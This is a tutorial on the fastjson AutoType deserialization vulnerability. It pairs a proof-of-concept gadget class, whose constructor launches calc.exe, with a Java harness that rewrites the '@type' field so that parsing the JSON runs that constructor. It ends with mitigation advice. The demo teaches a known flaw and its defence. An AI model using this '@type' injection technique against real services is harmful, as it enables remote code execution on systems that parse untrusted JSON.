背景
fastjson 在 1.2.25 之前的版本中 AutoType 默认开启；从 1.2.25 起默认关闭，需要显式开启才会生效。
而问题的根源就是这个 AutoType：它允许 JSON 文本通过 `@type` 字段指定反序列化时要实例化的类，只要攻击者能控制这段 JSON，就能让 fastjson 去实例化一个已经在 classpath 上的恶意类。
恶意类
/**
 * Proof-of-concept "gadget" class for the fastjson AutoType demo.
 *
 * It has no fields and does nothing except run a command from its no-argument
 * constructor. That is the whole point of the demo: if fastjson honours an
 * attacker-supplied "@type" naming this class, instantiating it during
 * JSON.parseObject() is enough to execute the constructor body - no method of the
 * resulting object ever needs to be called. The class must already be loadable by
 * the victim JVM (here it sits in the same project as the test harness); AutoType
 * resolves class names, it does not download code.
 */
public class Attack {

    /** Launches the payload and waits for it to exit; any failure is only printed. */
    public Attack() {
        try {
            // Payload: open the Windows calculator. Harmless, but visible proof that
            // arbitrary code ran inside the deserializing process.
            ProcessBuilder calculator = new ProcessBuilder("calc.exe");
            Process process = calculator.start();
            process.waitFor();
        } catch (Exception e) {
            // Same as the original: a failure (e.g. calc.exe missing on a non-Windows
            // host) is printed and the constructor still returns normally.
            e.printStackTrace();
        }
    }
}
测试类
public class Main {

    /**
     * Demonstrates the fastjson AutoType issue end to end: serialize a map with its
     * class name embedded, tamper with that class name the way an attacker who
     * controls the JSON would, then hand the tampered text back to JSON.parseObject().
     * On a fastjson build where AutoType is honoured, the parse instantiates
     * com.mytest.tt.Attack and its constructor runs before any application code sees
     * the result. The Attack class has to be on the classpath already - fastjson only
     * loads classes by name, it does not fetch code remotely.
     *
     * For real code: leave AutoType off (the default since 1.2.25), never feed
     * attacker-controlled JSON to a parser that has it enabled, and if polymorphic
     * deserialization is genuinely needed, restrict it to an explicit allow-list of
     * the classes you expect.
     */
    public static void main(String[] args) {
        Map<String, String> parent = new HashMap<>();
        parent.put("name", "123");
        // WriteClassName embeds the runtime class as the first key ("@type"); that is
        // precisely the field an attacker needs to control.
        String serialized = JSON.toJSONString(parent, SerializerFeature.WriteClassName);
        System.out.println("json序列化后:===>" + serialized);

        // Stand-in for a man-in-the-middle or a client sending crafted input.
        String tampered = hijacked(serialized);
        System.out.println("json被劫持后:===>" + tampered);

        // The constructor of the class named in "@type" runs during this call.
        System.out.println("反序列化成功:" + JSON.parseObject(tampered));
    }

    /**
     * Replaces the value of the first key in a serialized fastjson object with the
     * fully qualified name of the attack class.
     *
     * Assumes the first key is the "@type" marker emitted by WriteClassName, so its
     * value begins right after the colon and the opening quote. Splitting on commas
     * and re-joining them leaves every other segment byte-for-byte intact; only the
     * first segment is rewritten.
     *
     * @param json fastjson output whose first entry is the "@type" key
     * @return the same JSON text with the type name swapped for com.mytest.tt.Attack
     */
    private static String hijacked(String json) {
        String[] parts = json.split(",");
        // Keep `{"@type":"` (everything up to and including the quote after the colon)
        // and append the attacker-chosen class name plus its closing quote.
        int valueStart = parts[0].indexOf(":") + 2;
        parts[0] = parts[0].substring(0, valueStart) + "com.mytest.tt.Attack\"";
        return String.join(",", parts);
    }
}